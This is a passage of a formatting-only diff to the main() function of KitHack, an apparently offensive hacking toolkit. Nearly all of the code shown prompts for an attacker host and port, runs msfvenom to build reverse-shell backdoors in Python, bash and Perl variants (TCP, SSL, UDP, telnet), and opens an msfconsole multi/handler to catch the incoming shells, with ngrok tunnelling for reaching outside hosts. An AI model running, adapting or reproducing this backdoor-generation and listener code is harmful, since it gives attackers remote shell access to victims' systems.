) - ) + "{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -7225,55 +5987,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p python/shell_reverse_tcp LHOST={0} LPORT={1} -f raw > output/{2}.py".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p python/shell_reverse_tcp LHOST={0} LPORT={1} -f raw > output/{2}.py" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.py".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/shell_reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/shell_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/shell_reverse_tcp; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -7283,55 +6035,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p python/shell_reverse_tcp_ssl LHOST={0} LPORT={1} -f raw > output/{2}.py".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p python/shell_reverse_tcp_ssl LHOST={0} LPORT={1} -f raw > output/{2}.py" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.py".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/shell_reverse_tcp_ssl; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/shell_reverse_tcp_ssl; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/shell_reverse_tcp_ssl; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -7341,55 +6083,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p python/shell_reverse_udp LHOST={0} LPORT={1} -f raw > output/{2}.py".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p python/shell_reverse_udp LHOST={0} LPORT={1} -f raw > output/{2}.py" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.py".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/shell_reverse_udp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/shell_reverse_udp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/shell_reverse_udp; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -7405,7 +6137,8 @@ def main(): elif sys == "07": print("{0}\n [*] {1}Select Payload:\n".format(DEFAULT, GREEN)) print("{0}[01]{1} cmd/unix/reverse_bash".format(WHITE, YELLOW)) - print("{0}[02]{1} cmd/unix/reverse_bash_telnet_ssl".format(WHITE, YELLOW)) + print("{0}[02]{1} cmd/unix/reverse_bash_telnet_ssl".format( + WHITE, YELLOW)) pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) pay = pay.zfill(2) @@ -7414,55 +6147,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p cmd/unix/reverse_bash LHOST={0} LPORT={1} -f raw > output/{2}.sh".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p cmd/unix/reverse_bash LHOST={0} LPORT={1} -f raw > output/{2}.sh" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.sh".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.sh".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.sh". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_bash; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_bash; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD cmd/unix/reverse_bash; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -7472,55 +6195,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p cmd/unix/reverse_bash_telnet_ssl LHOST={0} LPORT={1} -f raw > output/{2}.sh".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p cmd/unix/reverse_bash_telnet_ssl LHOST={0} LPORT={1} -f raw > output/{2}.sh" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.sh".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.sh".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.sh". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_bash_telnet_ssl; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_bash_telnet_ssl; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD cmd/unix/reverse_bash_telnet_ssl; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -7545,55 +6258,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p cmd/unix/reverse_perl LHOST={0} LPORT={1} -f raw > output/{2}.pl".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p cmd/unix/reverse_perl LHOST={0} LPORT={1} -f raw > output/{2}.pl" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.pl".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.pl".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.pl". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_perl; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_perl; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD cmd/unix/reverse_perl; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -7603,55 +6306,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p cmd/unix/reverse_perl_ssl LHOST={0} LPORT={1} -f raw > output/{2}.pl".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p cmd/unix/reverse_perl_ssl LHOST={0} LPORT={1} -f raw > output/{2}.pl" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.pl".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.pl".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.pl". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_perl_ssl; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_perl_ssl; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD cmd/unix/reverse_perl_ssl; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -7667,16 +6360,15 @@ def main(): elif sys == 9: LHOST = raw_input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = raw_input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - PAYLOAD = raw_input("\n{0}SET PAYLOAD: {1}".format(YELLOW, DEFAULT)) + PAYLOAD = raw_input("\n{0}SET PAYLOAD: {1}".format( + YELLOW, DEFAULT)) if ".tcp.ngrok.io" in LHOST: LHOST = "127.0.0.1" LPORT = "443" # continue os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {}; set LPORT {}; set PAYLOAD {}; exploit\'"'.format( - LHOST, LPORT, PAYLOAD - ) - ) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {}; set LPORT {}; set PAYLOAD {}; exploit\'"' + .format(LHOST, LPORT, PAYLOAD)) pause("\n{}Press any key to continue...".format(GREEN)) os.system("clear") main() @@ -7689,7 +6381,9 @@ def main(): main() elif option == "11": - webbrowser.open("https://adrmxr.github.io/KitHack", new=1, autoraise=True) + webbrowser.open("https://adrmxr.github.io/KitHack", + new=1, + autoraise=True) os.system("clear") main() @@ -7715,10 +6409,8 @@ def main(): except KeyboardInterrupt: choice = input( - "\n\n{0}[1] {1}Return to KitHack {0}[2] {1}Exit \n{2}KitHack >> {1}".format( - GREEN, DEFAULT, RED - ) - ) + "\n\n{0}[1] {1}Return to KitHack {0}[2] {1}Exit \n{2}KitHack >> {1}" + .format(GREEN, DEFAULT, RED)) choice = choice.zfill(2) if choice == "01": if os.path.isfile("/usr/local/bin/kithack"):